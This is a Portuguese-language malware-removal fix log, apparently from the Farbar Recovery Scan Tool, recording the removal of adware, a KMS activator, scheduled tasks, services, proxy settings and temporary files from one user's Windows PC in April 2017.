Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKCR\Wow6432Node\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a). HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a). HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave não encontrado (a). HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave não encontrado (a). HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida HKCR\CLSID\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave não encontrado (a). HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0F373340-7552-468F-805A-12372F3EBBA3} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0F373340-7552-468F-805A-12372F3EBBA3} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{864BC306-9BC2-4E24-860C-052C2BDED33D} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C13CF54-132B-47A3-A9C3-46781DDE17AA} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C13CF54-132B-47A3-A9C3-46781DDE17AA} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\rundetector => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\Milimili => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{25AF1857-93F1-41E3-95BA-7EE079948513} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{25AF1857-93F1-41E3-95BA-7EE079948513} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\R@1n-KMS\Office14ProPlus => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\R@1n-KMS\Office14ProPlus => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4DCED5E7-C4D2-48E0-9465-4A9A58089B29} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4DCED5E7-C4D2-48E0-9465-4A9A58089B29} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5280B2E7-F127-40B0-AF3E-0A0674B4F874} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5280B2E7-F127-40B0-AF3E-0A0674B4F874} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{77706C8A-94AF-4E57-B8E2-03CF78500731} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{77706C8A-94AF-4E57-B8E2-03CF78500731} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{84A4D586-F069-481B-8AC3-656EF9F0018C} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{84A4D586-F069-481B-8AC3-656EF9F0018C} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DC21957-9D43-435F-A928-0AC2F312D7CE} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DC21957-9D43-435F-A928-0AC2F312D7CE} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B682F9E1-06F9-433A-803D-072B9B9DB540} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B682F9E1-06F9-433A-803D-072B9B9DB540} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C1AC93B9-454A-437E-9027-1A2004FA261D} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C1AC93B9-454A-437E-9027-1A2004FA261D} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-Weekend => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6392B5A-3A2E-4477-B098-2CA65E62ACE6} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6392B5A-3A2E-4477-B098-2CA65E62ACE6} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CC21D6E8-24A8-4ABE-8FEB-697524D453D0} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC21D6E8-24A8-4ABE-8FEB-697524D453D0} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CD7FFAF9-0423-42E9-A52D-5840EDA92753} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FFAF9-0423-42E9-A52D-5840EDA92753} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BackgroundContainer Startup Task => chave não encontrado (a). HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0A2BEA2-67D5-468B-87FB-8A28DC93D858} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0A2BEA2-67D5-468B-87FB-8A28DC93D858} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\T0528 => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\T0528 => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} => chave removido (a) com sucesso. C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F961350E-3BDD-4EB4-9FDA-1DE60446BA52} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F961350E-3BDD-4EB4-9FDA-1DE60446BA52} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} => chave removido (a) com sucesso. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 => chave removido (a) com sucesso. C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Atalho argumento removido (a) com sucesso.. C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Atalho argumento removido (a) com sucesso.. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => chave removido (a) com sucesso. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OSppSvc.exe => chave removido (a) com sucesso. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SppExtComObj.exe => chave removido (a) com sucesso. HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso. C:\Users\ADEMIR MONTEIRO\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => movido com sucesso C:\ProgramData\bc.ini => movido com sucesso C:\ProgramData\DP45977C.lfl => movido com sucesso C:\ProgramData\FileSplitUpLoad.dll => movido com sucesso C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log => movido com sucesso C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log => movido com sucesso C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log => movido com sucesso C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log => movido com sucesso C:\ProgramData\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}.log => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Firefox => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Firefox => movido com sucesso C:\Program Files (x86)\Firefox => movido com sucesso C:\WINDOWS\SysWOW64\D50A.tmp => movido com sucesso C:\ProgramData\SUPERAntiSpyware.com => movido com sucesso C:\Users\ADEMIR MONTEIRO\Downloads\SUPERAntiSpyware.exe => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\InstallHelper.exe => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u121-windows-au.exe => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\jre-8u131-windows-au.exe => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\SkypeSetup.exe => movido com sucesso C:\Users\ADEMIR MONTEIRO\AppData\Local\Temp\tmp6CD8.tmp.exe => movido com sucesso C:\Windows\KMS-R@1n.exe => movido com sucesso C:\WINDOWS\KMS-R@1nHook.exe => movido com sucesso C:\WINDOWS\KMS-R@1nHook.dll => movido com sucesso "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" => não encontrado (a). 2017-04-2C:\ProgramData\FileSplitUpLoad.dll => Erro: Nenhuma correção automática foi encontrada para esta entrada. "C:\Users\Todos os Usuários\FileSplitUpLoad.dll 5 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll" => não encontrado (a). Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\libpng.dll" => Agendado para ser movido na reinicialização. C:\WINDOWS\system32\log => movido com sucesso "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech" pasta mover: Não pode ser movido "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech" => Agendado para ser movido na reinicialização. "C:\Program Files (x86)\Elex-tech" pasta mover: Não pode ser movido "C:\Program Files (x86)\Elex-tech" => Agendado para ser movido na reinicialização. C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys => movido com sucesso C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys => movido com sucesso HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor não encontrado (a). HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\PSafeTray => valor removido (a) com sucesso. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\PSafeWDS => valor removido (a) com sucesso. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BAV mini setup => valor removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\ChromeHTML => chave removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013} => chave removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013} => chave removido (a) com sucesso. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6B446C8A-9266-46AB-85A6-E92C5974B43E} => valor removido (a) com sucesso. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{262684D5-BC5E-4F5C-8F2E-98E50A972023} => valor removido (a) com sucesso. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2F741DD0-F787-409E-A9D6-5CC26B96E1B6} => valor removido (a) com sucesso. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{63A99386-ABB8-4DE5-B464-8682581FB0CB} => valor removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\FirefoxU => chave removido (a) com sucesso. FirefoxU => serviço removido (a) com sucesso. iSafeService => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida Kitty => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\Kitty => chave removido (a) com sucesso. Kitty => serviço removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\KMS-R@1n => chave removido (a) com sucesso. KMS-R@1n => serviço removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\PSafeSVC => chave removido (a) com sucesso. PSafeSVC => serviço removido (a) com sucesso. HKLM\System\CurrentControlSet\Services\PSafeWD => chave removido (a) com sucesso. PSafeWD => serviço removido (a) com sucesso. WinSAPSvc => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\WinSAPSvc => chave removido (a) com sucesso. WinSAPSvc => serviço removido (a) com sucesso. iSafeKrnl => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida iSafeKrnlMon => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => chave removido (a) com sucesso. iSafeKrnlMon => serviço removido (a) com sucesso. iSafeKrnlR3 => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida iSafeNetFilter => Não foi possível finalizar o serviço. HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe" => Agendado para ser movido na reinicialização. Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe" => Agendado para ser movido na reinicialização. Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe" => Agendado para ser movido na reinicialização. Ponto de Restauração criado com sucesso. ========= RemoveProxy: ========= HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso. HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso. HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso. ========= Fim de RemoveProxy: ========= C:\Windows\System32\Drivers\etc\hosts => movido com sucesso Hosts restaurado com sucesso. =========== EmptyTemp: ========== BITS transfer queue => 4152862 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 366879111 B Java, Flash, Steam htmlcache => 9277 B Windows/system/drivers => 761078012 B Edge => 22474614 B Chrome => 824828476 B Firefox => 431487264 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 2128 B systemprofile32 => 35123276 B LocalService => 309006 B NetworkService => 19867916 B ADEMIR MONTEIRO => 2553465209 B RecycleBin => 19899 B EmptyTemp: => 4.7 GB de dados temporários Removidos. ================================ Resultado dos arquivos que foram agendados para serem movidos (Modo de Inicialização: Normal) (Data&Hora: 28-04-2017 14:27:55) "C:\Program Files (x86)\Elex-tech\YAC\libpng.dll" => Não pode ser movido C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Elex-tech => movido com sucesso "C:\Program Files (x86)\Elex-tech" => Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe" => Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe" => Não pode ser movido "C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe" => Não pode ser movido Resultado dos registros marcados para excluir será exibido após a reinicialização: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => chave Não pode ser removido, chave pode estar protegida HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave Não pode ser removido, chave pode estar protegida HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => chave Não pode ser removido, chave pode estar protegida HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6F2E5825-C576-4536-A9BE-FF7181495112} => chave Não pode ser removido, chave pode estar protegida HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BD62CFA9-F375-461C-A90E-AB90B578F202} => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeService => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnl => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnlBoot => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnlKit => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeKrnlR3 => chave Não pode ser removido, chave pode estar protegida HKLM\System\CurrentControlSet\Services\iSafeNetFilter => chave Não pode ser removido, chave pode estar protegida ==== Fim de Fixlog 14:28:31 ====